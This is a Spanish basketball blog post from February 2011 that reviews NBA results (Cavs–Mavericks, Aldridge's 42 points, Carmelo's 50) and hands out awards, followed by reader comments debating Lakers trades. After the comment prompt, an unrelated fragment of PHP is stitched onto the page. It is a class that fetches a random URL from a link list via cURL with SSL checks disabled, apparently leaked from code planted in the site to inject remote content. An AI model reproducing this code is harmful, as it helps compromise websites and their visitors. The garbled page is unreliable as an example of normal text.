La Crónica (07/02/2011)

08 de February de 2011 por TheDeerHunter

Pues en efecto no ganaron los Cavs a Dallas (96-99). 25 y subiendo, nos tememos… y bye-bye a los euros de Sayim y quizás a la vocación adivinatoria de Denise. Como adelantaba el compañero fue un choque muy disputado con un gran Hickson y un renqueante Nowitzki. Stojakovic debutó algo flojo como titular y fue el banquillo y los pequeños detalles los que desequilibraron la balanza. Los Cavs tienen la oportunidad de romper esta terrible racha contra Detroit en el Quicken Loans Arena.

Sí hubo, en cambio, tres sorpresas significativas durante la jornada. Los Celtics cayeron en Charlotte (89-94). Allen, que se reserva el record de triples de Reggie Miller para el partido contra los Lakers, fue el mejor de su equipo. En esta ocasión fue la segunda unidad la que falló, destrozada por la de los Bobcats, con un gran Gerald Henderson y, sobre todo, un Shaun Livingston como el de sus buenos tiempos.

Los Wolves, por su parte, asaltaron el siempre complicado Arena de New Orleans (104-92). Al animal de Love, que ha igualado el récord de Garnett de 37 dobles-dobles, se le unió Beasley (aunque tuvo que retirarse lesionado) y un extraordinario banco, con Tolliver, Ellington, Pekovic y Telfair. Los Hornets están echando de menos a dos de sus piezas clave.

Además, los Bulls sucumbieron ante el poderío de LaMarcus Aldridge, en el mejor momento de su carrera, Andre Miller y Rudy Fernandez. Resultado importantísimo para ellos (103-109). Además, con el All Star a las puertas la portentosa actuación de LaMarcus es algo que llama aún más la atención si cabe.

Los Lakers le hicieron un favor a McMillan cuajando un partido a cara de perro en Memphis (93-84). Dijimos hace unos días que no debíamos fiarnos y lo corroboramos en la derrota contra los subcampeones. Parece que tienen intención de ponerse serios, pero la motivación tampoco es algo que se coja de la noche a la mañana. Los Grizzlies sufrieron con la peor actuación de Zach del año bajo los alargados brazos de Pau. Jason Williams vuelve al equipo con la clara intención de ayudarles a volver a entrar en postemporada.

Por su parte, los Rockets no aflojan. Anoche Scola y Martin se encargaron de amargarle los 50 puntazos a Melo (108-103). Yo también soy adivino y auguro que aparecerá en el mayor esfuerzo en vano. Billups se lesionó. Veremos, porque sin él es posible que los Nuggets pasen a ser el objetivo de la caza que viene protagonizándose en la cola del Oeste. En esta situación los Suns lograron su victoria contra los Warriors (104-92). Ya sabemos que éstos tienen la (in)sana costumbre de dar una de cal y otra de arena.

Terminamos con la victoria ajustada de los Jazz en Sacramento (107-104) celebrando la renovacion de Jerry Sloan por un año más (24 años en Utah…). Los resultados no acompañan, pero qué buena pinta tiene la parejita Evans-Cousins.

PREMIOS

MVP: Sino pasa nada extraño, Lamarcus Aldridge se quedará sin All-Star y a pesar de saber que todos los que irán se lo merecen tanto como él, no puedes dejar de pensar que es una pequeña injusticia. Ante la baja de Roy, Aldridge ha asumido con éxito los galones de los Blazers. Anoche, se impusieron a los Bulls con 42 puntos y 8 rebotes del ala-pívot.

Rookie: Bonita hornada de rookies la de esta noche. A los mediáticos Blake Griffin y John Wall, se une un Demarcus Cousins en estado de gracia últimamente. 25 puntos, 14 rebotes en 30 minutos de juego.

Sorpresa: JJ Hickson sobresale en los mediocres Cavs. Anoche fue de lo mejor de su equipo con 26 puntos y 12 rebotes.

Decepción: Podríamos volver a hablar de los Cavs pero para no repetirnos destacaremos el insulso partido de Arron Afflalo. 4 puntos y 3 pérdidas, su bagaje en 28 minutos, muy lejos de las buenas actuaciones que protagoniza este año.

Esfuerzo en vano: Mayúsculo esfuerzo en vano el de esta jornada. Si hace unos días fue Lebron James el que sobrepasó los 50 puntos, anoche fue su compañero de promoción, Carmelo Anthony, el que lo consiguió. ¿Diferencia? Que Melo no ha podido llevarse la victoria.

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. Denise dice:
    #1

    Reconoced que estuve cerca de acertar…, mucho criticar a los Cavs, pero la temporada de los Wolves tambien es para hacersela mirar, no van a llegar ni a 20 victorias.
    En el resumen del Blazers-Bulls se ve a un aficionado con un cartel comparando los números de Duncan con los de Aldridge, pidiendo el All-Star para Lamarcus.
    ¿Hay alguien mas sucio por las zonas que Perkins? Vaya manera de repartir cera…, si los arbitros no fuesen tan permisivos con él, o quizás, si no jugase en Boston, este hombre estaría expulsado siempre por faltas o técnicas antes del descanso
    Buen fichaje el de Jason Williams para los Grizzlies,..todavia me pregunto por qué Van Gundy no le ha dado bola, y que coj.pinta Duhon en el equipo.
    Es Memphis la ciudad con más seguidores de Lakers (despues de L.A. obviamente). Siempre está lleno de gente con camisetas y prendas amarillas.

      Citar

  2. sergio dice:
    #2

    Los Cavs al menos ultimamente dan algo de guerra en la pista y parece que a los equipos les cuesta algo mas.

    Partidazo de Carmelo que no le sirve para nada. Tambien grandes partidos de A.Miller, Aldridge y Rudy para vencer a todo unos nº3 del Este. McMillan me cae gordo, pero este año no tengo nada que objetarle la verdad. Y mira que jugar practicamente sin pivot….

    Por una vez en los Lakers todos aportan mas o menos lo mismo… y por fin controlan un partido. Kobe se ha tirado unas cuantas mas de la cuenta, pero cuando podia hacerlo.

    La marca que ha empatado Love es la de partidos consecutivos en dobles-dobles para los Wolves??? Por cierto, el otro dia investigué quien tenía el record de dobles-dobles consecutivos en la historia y lo tiene, ¿quien si no?, Chamberlain con mas de 200 seguidos.

    Os queria preguntar que os pareceria un traspaso Bynum+Artest+Blake por Nash+Gortat+Pietrus. Hay ventaja en salarios de 3 kilos para Lakers (se podria sumar alguien como Hill, Warrick, Dudley,…)

      Citar

  3. Vader dice:
    #3

    @sergio

    No creo que le valga la pena a los Lakers… Los principales jugadores implicados serian Nash y Bynum, el primero es muy viejo y el segundo muy joven. Bynum a tenido muchos problemas de lesiones pero nadie nos asegura que los siga teniendo o que no le vuelvan a ocurrir. Repito, no lo veria buen negocio para Lakers.

    Saludos

      Citar

  4. TheDeerHunter dice:
    #4

    En la línea de lo que muchos han defendido estos días yo veo muy poco mejorable en la plantilla de Lakers. Creo que en mayor o menor medida todos somos conscientes que su problema no es ese.

    En concreto, del trade que propones, creo que Phil Jackson y Steve Nash son absolutamente incompatibles. El triángulo ofensivo no requiere de un base distribuidor… si es que requiere de un base propiamente dicho. Aquí los pases están predefinidos. Más bien requiere de un buen tirador/defensor. Conque además pueda subir la bola sobra.

    Sin Nash de por medio toda la propuesta se cae. Me gustan Gortat y Pietrus para los Lakers, creo que aportarían mucho, pero no a costa de perder los otros 3 jugadores.

    Sólo hay tres operaciones ahora mismo que no vería con demasiado malos ojos si pudieran resolverse favorablemente:
    1.- Artest: cuya competitividad la veo muy mermada por unas razones o por otras. Si el año pasado estaba seguro de que al final cumpliría, ahora no estoy demasiado seguro que sea la mejor opción posible para minimizar los aleros estrella rivales. Le veo más lento y más torpe que nunca.
    2.- Bynum: no soy muy optimista ante sus problemas físicos. No creo que vayan a permitirle nunca llegar a ser lo que prometía y no creo que se pueda confiar en su fiabilidad de cara a las eliminatorias.
    3.- Odom: no hay mejor momento que ahora para engañar a alguien con él. Es indiscutiblemente el mejor activo disponible para un hipotético mercado… aunque a algunos también nos jodería más que nunca que lo traspasen ahora.

    En cualquier caso creo que es imposible que algún traspaso pueda mejorar realmente alguna de las tres opciones.

      Citar

  5. sergio dice:
    #5

    Yo eso de hacer el equipo mas viejo tampoco lo veo lo mas importante. Estos Lakers dentro de 4 o 5 años serán un erial con Bryant y Gasol envejecidos. Nash no es el jugador que le gusta a Phil pero creo que Nash se adaptaría con tal de conseguir su tan preciado anillo. Penetra mas que Fisher, dobla balones a los jugadores altos, tira como los angeles, sabe jugar eliminatorias como el que más y es más intenso defendiendo en postemporada de lo que muchos creen… a mi no me parece mal opcion. Como creo que los unicos dos jugadores que no estan rindiendo a su nivel este año son Blake y Artest pues he pensado en un recambio para ambos.

    De todas maneras comprendo vuestras dudas. Yo si pudiese elegir me traía a Hinrich, Battier, Grant Hill, Pietrus,… jugadores que ocupen dos puestos exteriores, tiren algo mejor que Artest, defiendan bien y sepan aportar sin tener la pelota. Ahora habria que ver a que equipo es capaz de “engañar” otra vez Kupchak para mejorar a la mejor plantilla de los Lakers en muchos años

      Citar

  6. TheDeerHunter dice:
    #6

    La historia no es si elegir entre Nash o Fisher/Blake. (Aunque esa es otra… a ver qué aficionado Laker largaba a Fisher)

    La historia es que yo creo que Kupchak no se plantea que haya forma humana de engañar a nadie para mejorar esta plantilla. Veremos si es así. También es pronto para decirlo, porque hasta que no lleguen los cruces no vamos a saber fielmente cómo está el equipo.

      Citar

  7. HisRoyalAirness dice:
    #7

    Los lakers necesitan un tirador fiable como el comer, es la única carencia que les veo. Y por 2 triples que se mete al año creo, lo digo por décima vez este año, que Fischer no puede jugar en los Lakers, no defiende en carrera ni a Shaquille. Va a defender en PO a Westbrook, Parker o Paul? Ni en sus mejores sueños. Al final tendrá que emplearse Kobe en defensa contra el base y ahí salen perdiendo los Lakers.

    Y una pregunta al oráculo de tjnba, aunque no venga a cuento: cómo veis la posible futura situación Beasley-Love-Ricky? Prometedora o difícil de congeniar en la cancha?

      Citar

  8. MagicJohnson32 dice:
    #8

    @ HisRoyalAirness: Es que Ricky no va a jugar en Minnesota. Lo ha dicho él, su familia, su representante… Vamos, que yo no me preocuparía por eso.

      Citar

  9. Ru dice:
    #9

    En base a esto último que se plantea,¿cómo está siendo la temporada de Flynn?¿Ha recuperado la forma?Por números parece que no pero este año hay que tener en cuenta que hay un tal Love por ahí comiéndose el mundo y han sumado a un Beasley que en Miami estaba bajo la hipnosis de Wade.¿Compatible Flynn con ellos dos?

    Por otro lado me alegro enormemente por LaMarcus,siempre se le ha tildado de falta de carácter pero en situaciones como esas es donde se demuestra lo que vale uno.Un inciso,que no es novedad…enésima ocasión que parece que Rudy es MJ según Marca…no es que no aprecie que haga un buen partido pero deberían tener un poco de vergüenza al ver que otros 2 jugadores han hecho un partidazo.

      Citar

  10. Txusma dice:
    #10

    “Rudy Fernández se luce sin piedad ante unos Bulls que le pretenden”

    Vaya cachondos los de MARCA. Si alguien sigue la NBA exclusivamente a través suyo va apañado…

    Por cierto, y aprovechando que comento por aquí, hemos colocado unos botoncitos para que sea la mar de sencillo compartir los artículos via twitter o facebook. Esperemos que sirvan para algo.

      Citar

  11. TheDeerHunter dice:
    #11

    La clave de la defensa de los Lakers rara vez es defender en carrera. No creo que haya quejas de la faceta defensiva de Fisher durante sus años en L.A. con sus características, virtudes y carencias.
    Si los dos triples al año suponen dos anillos, desde luego que puede jugar en los Lakers. Fisher para los aficinados amarillos es intocable, como lo fue Horry y así nos fue… y lo siguió siendo en San Antonio aún después.

    Son jugadores demasiado especiales como para ignorarlos e infravalorarlos. La misma piedra con la que se tropiezan TODOS.

      Citar

  12. MagicJohnson32 dice:
    #12

    http://sports.espn.go.com/los-angeles/nba/news/story?id=6101304

    Chris Boussard (ESNP) dice que Nuggets y Lakers han empezado a negociar un trade que incluiría a Melo y Bynum.

      Citar

  13. Txusma dice:
    #13

    Soy super escéptico respecto un trade de estas características. Carmelo y Kobe en el mismo equipo? Parece que no cuadre… Y lo mejor q pueden conseguir los Nuggets por Carmelo es Bynum? Prefiero las opciones de NJ (Favors, tropecientas 1ª rondas) o NY (Wilson Chandler, Gallinari, Fields…).

      Citar

  14. Denise dice:
    #14

    Desde mi punto de vista, a los Lakers no les hace falta ningun trade. Tienen el mejor equipo de la liga, solo les hace falta actitud, tanto al equipo como a Phil que en determinados momentos parecen que todos se han abotirrado de pastillas calmantes antes del partido.
    Si acaso, se pueden traer a un 1-2 tirador (como ha dicho alguien por ahi arriba) bien, pero no a costa de traspasar los jugadores mas importantes del equipo. Por ejemplo, yo iría a por Daniel Gibson ofreciendole a los dos rookies y/o rondas de draft.
    Fichar a Melo sería el mayor error que pueden cometer los Lakers.
    Ya sé que Bynum se lesiona a menudo, y bla bla, pero cuando esta bien es un jugador fundamental, Yo no traspasaria a Bynum por ningun otro pivot (salvo por Howard, pero esta opcion es imposible).
    @ Deer: Me extraña muchisimo que quieras traspasar a Odom, cuando está haciendo el mejor año de su carrera, y puede ayudar muchíiiiisimo al equipo, tanto como que creo que va a ser el mejor 6º hombre.
    ¿Crees que se podría traer a algo mejor que él? ¿A quien?
    Dudo que el vendedor de hamburguesas no va a jugar en Minnessota. Los divos no pueden jugar en ciudades feas, con pequeños mercados, y en equipos en reconstrucción. Esto no es un lugar para un jugador franquicia como Ricky, él necesita un equipo top 5 donde pueda jugar 35 minutos por partido.
    (Ironia off)
    Desde cuando Marca es una fuente de información? Desde que Inda está en la cuspide, el periodico se ha convertido en un panfleto donde los españoles son los mejores y los mas buenos, todo el que no haya nacido en España tiene envidia al pais (especialmente los franceses) y Pellegrini y Ramon Calderon son los culpables de todos los problemas.

      Citar

  15. LEmontus dice:
    #15

    Gran comentario el de Denise.

      Citar

  16. HisRoyalAirness dice:
    #16

    Por cierto yo no menosprecio a Fisher Deer, sôlo digo que la distancia con sus pares comienza a ser abismal. Ojalá los mitos fueran imperecederos, pero no lo son. Creo que necesitan un tìo que esté en el perímetro de palomero y que tenga un porcentaje de acierto razonable, porque en los lakers ultimamente es “voy a probar a tirar de 3, si entra bien y sino no me importa, no soy un especialista”.

      Citar

  17. Txusma dice:
    #17

    Si Bynum no se perdiera los partidos que se pierde cada temporada no te diría que fuera casi intransferible pero ahora mismo yo lo cambiaba por ejemplo por Marc Gasol. Mejor tener un jugador de 7, 82 partidos que uno de 8, 50 y a medio gas en la mitad.

      Citar

  18. TheDeerHunter dice:
    #18

    Yo creo que el mito, HisRoyalAirness, es que Fisher es simplemente un palomero. Para muestra los últimos playoffs, que fueron buenísimos por su parte.
    En la final sufrió, como hubiera sufrido cualquier mortal, pero como siempre terminó siendo decisivo.

    Estamos hablando que de momento no hay ninguna constancia de que haya perdido su magia… también porque éste no es el momento de evaluarle. Si yo tuviera que darle el balón a alguien para ganar un partido decisivo se lo daría al pescador antes que a la inmensa mayoría de estrellas rutilantes de esta liga.

    @Denise: Es la mejor temporada que yo haya visto de Odom en L.A. pero como ya ha jugado unas cuantas y sabemos bien de qué pie cojea es fácil creer que esto no va a ser eterno. De cara a su “cotización” este es el mejor momento para sacar algo bueno por él. También he dicho que tal y como está el mercado es difícil sino imposible mejorarlos.

    Sobre la “paja mental” de Melo. Yo tampoco me la creo. Si los Lakers desintegran su juego interior por tener un Big Three dejarán de ser automáticamente candidatos al anillo. Traer a Melo para hacer de Glen Rice sería un error histórico para la franquicia y sería la sentencia definitiva al proyecto Gasol-Kobe.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>